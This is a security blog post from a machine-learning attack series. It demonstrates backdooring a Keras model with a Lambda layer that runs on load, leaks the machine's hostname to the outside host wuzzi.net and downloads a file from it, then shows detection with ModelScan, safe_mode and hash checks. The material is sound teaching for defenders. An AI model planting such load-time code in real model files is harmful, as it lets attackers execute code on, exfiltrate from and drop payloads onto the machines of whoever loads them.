Machine Learning Attack Series: Backdooring Keras Models and How to Detect It

This post is part of a series about machine learning and artificial intelligence.

Adversaries often leverage supply chain attacks to gain footholds. In machine learning, model deserialization issues are a significant threat, and detecting them is crucial, as they can lead to arbitrary code execution. We explored this attack with Python Pickle files in the past.

In this post we cover backdooring the original Keras Husky AI model from the Machine Learning Attack Series, and afterwards investigate tooling to detect the backdoor.

Red Teaming Machine Learning - Attack Series

The technique described is based on this post by Microsoft, named Abusing ML model file formats to create malware on AI systems.

Let’s get started.

Revisiting Husky AI

The original Husky AI model is stored as an .h5 file. You can find it here.

Note: If you want to follow along, check out this Notebook.

git clone https://huggingface.co/wunderwuzzi/huskyai

To get started let’s load up the original model:

import keras
model = keras.models.load_model("huskymodel.h5")
model.summary()

And do a random inference to ensure things work:

import numpy as np
random_image = np.expand_dims(np.random.rand(128, 128, 3), axis=0)
prediction = model.predict(random_image, verbose=0)
print("Prediction output:", prediction)

Prediction output: [[0.1144329]]

Great, so things work.

Now let’s put ourselves into an attacker’s shoes.

Loading the Original Model

Assume we find the Husky AI Keras model file (in this case the .h5 file) somewhere on a network share, where production systems, developers and/or data scientists load it from.

Threat => This means an attacker can perform a supply chain attack by modifying the file and adding malicious instructions.

Adding a Custom Layer

To add executable code, we can add a Keras lambda layer to the model architecture.

For the demo we:

  1. Print a “Hello world” message to visually demonstrate code execution, and
  2. Download an image from a remote server and, with the same web request, leak the hostname of the machine (the same mechanism could be used to download malware to the host)

The code looks like this:

temp_model = keras.models.load_model("huskymodel.h5")

def delicious_layer(x):
    print("Hello world! Husky AI is now backdoored.")

    import http.client, os
    # Download an image from the remote server and leak the hostname via the
    # query string - but only once per host
    if not os.path.exists("embracethered.png"):
        conn = http.client.HTTPSConnection("wuzzi.net")
        host = os.getenv("HOSTNAME")
        conn.request("GET", f"/l.png?lambdahost={host}")
        res = conn.getresponse()
        data = res.read()
        with open("embracethered.png", "wb") as f:
            f.write(data)
    return x

lambda_layer = keras.layers.Lambda(delicious_layer)
temp_model.add(lambda_layer)

Saving the Backdoored Model File

Finally, we compile the model using the original settings and save it.

temp_model.compile(optimizer=model.optimizer, loss=model.loss, metrics=model.metrics)
temp_model.save("huskymodel-lambda-backdoor")

There are multiple file format options when saving the model; more about this later.

Simulating the Attack

Now, let’s load the backdoored model.

backdoor_model = keras.models.load_model("huskymodel-lambda-backdoor")

backdoor layer added

As you can see in the screenshot above, the print statement was already executed!

Tip: If the model is saved as .keras, using the Keras v3 file format, then this load would fail.

This is because safe_mode=True is the default for the v3 format; however, safe_mode is not considered for older model formats. Unfortunately, saving a model in the newer format is not the default. Hence, remember to use the .keras extension and/or save_format="keras" when saving model files.
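
As a minimal sketch (the .keras file name is illustrative, and the exact exception type and message may vary by Keras version), saving the backdoored model in the v3 format and loading it back shows safe_mode kicking in:

temp_model.save("huskymodel-lambda-backdoor.keras")

try:
    # safe_mode=True is the default and refuses to deserialize the embedded Lambda code
    keras.models.load_model("huskymodel-lambda-backdoor.keras")
except Exception as e:
    print("Load blocked by safe_mode:", e)

# Only opt out of safe_mode for models you fully trust:
# keras.models.load_model("huskymodel-lambda-backdoor.keras", safe_mode=False)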

Let’s take a look at the architecture to see if we can find the additional layer:

backdoor_model.summary()

Here we go:

backdoor layer added

Excellent, notice the last layer named lambda_17.

Checking the Result

As we observed earlier, just loading the model executed the print function:

Hello world! Husky AI is now backdoored.

And when listing the directory contents, we see that embracethered.png was indeed downloaded from the remote server.

-rw-r--r-- 1 root root  34K May 13 22:40 embracethered.png

And the server log also shows the hostname that was retrieved:

server log

Nice, but scary!

Inspecting and Identifying Backdoored Models

If you walk through the Notebook, you can find Python code to check for hidden lambda layers and Python byte code.
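
The idea looks roughly like the following sketch (my own illustration, not the exact Notebook code; it assumes the Lambda layer exposes its callable via layer.function, and keep in mind that loading an untrusted model already executes embedded code, so do this in an isolated environment):

import dis

# Flag Lambda layers in an already-loaded model and disassemble their
# Python bytecode for manual review
for layer in backdoor_model.layers:
    if isinstance(layer, keras.layers.Lambda):
        print(f"Suspicious Lambda layer found: {layer.name}")
        dis.dis(layer.function)  # assumes the callable is stored as layer.function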

A very practical detection you should consider is Protect AI’s ModelScan tool.

pip install modelscan

Then you can point it to the model file:

modelscan -p huskymodel-lambda-backdoor

Observe that it indeed detected the backdoor:

modelscan output

Excellent. It’s great to have an open source tool available to detect this and other issues.

Severity levels are defined here. In our specific case, arbitrary code runs and a file is downloaded from a remote location, which arguably makes it higher severity than medium. So, make sure to investigate all flagged issues and look for malicious instructions.

Takeaway: I highly recommend integrating such tooling into your MLOps pipelines.

Mitigations and Detections

  • Signature Validation: Use signatures and/or validate hashes of models (e.g. a SHA-256 hash; see the sketch after this list)
  • Audits: Ensure auditing of model files from untrusted sources
  • Scanning and CI/CD: Explore scanning tools like Protect AI’s modelscan
  • Isolation: Load untrusted models in isolated environments (if possible)
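
For the signature validation item, here is a minimal hash-check sketch (the expected digest below is a placeholder you would distribute out-of-band):

import hashlib

# Placeholder: replace with the known-good digest of your model file
EXPECTED_SHA256 = "<known-good sha-256 digest>"

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

if sha256_of("huskymodel.h5") != EXPECTED_SHA256:
    raise RuntimeError("Model hash mismatch - refusing to load the file.")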

Conclusion

As we can see, machine learning model files should be treated like binary executables. We also discussed how backdoored model files can be detected and what tooling can be integrated into MLOps pipelines.

Hope this was helpful and interesting.

Cheers, Johann.

Appendix

ML Attack Series - Overview

Modelscan Output

--- Summary ---

Total Issues: 1

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 1
    - HIGH: 0
    - CRITICAL: 0

--- Issues by Severity ---

--- MEDIUM ---

Unsafe operator found:
  - Severity: MEDIUM
  - Description: Use of unsafe operator 'Lambda' from module 'Keras'
  - Source: /content/huskyai/models/huskymodel-lambda-backdoor/keras_metadata.pb

Loading an Image

import cv2
import numpy as np
import imageio.v2 as imageio
import matplotlib.pyplot as plt

num_px = 128  # the model expects 128x128 pixel input images

def load_image(name):
    # Read the image and resize it to the model's expected input size
    image = np.array(imageio.imread(name))
    image = cv2.resize(image, (num_px, num_px))

    # Drop the alpha channel if present (e.g. for PNG files)
    if image.shape[-1] == 4:
        image = cv2.cvtColor(image, cv2.COLOR_RGBA2RGB)

    # Scale pixel values to [0, 1] and add a batch dimension
    image = image / 255.
    image = np.expand_dims(image, axis=0)
    return image

Doing a Prediction

# Load a validation image, display it, and run a prediction with the model
image1 = load_image("/tmp/images/val/husky/8b80a51b86ba1ec6cd7ae9bde6a32b4b.jpg")
plt.imshow(image1[0])
model.predict(image1)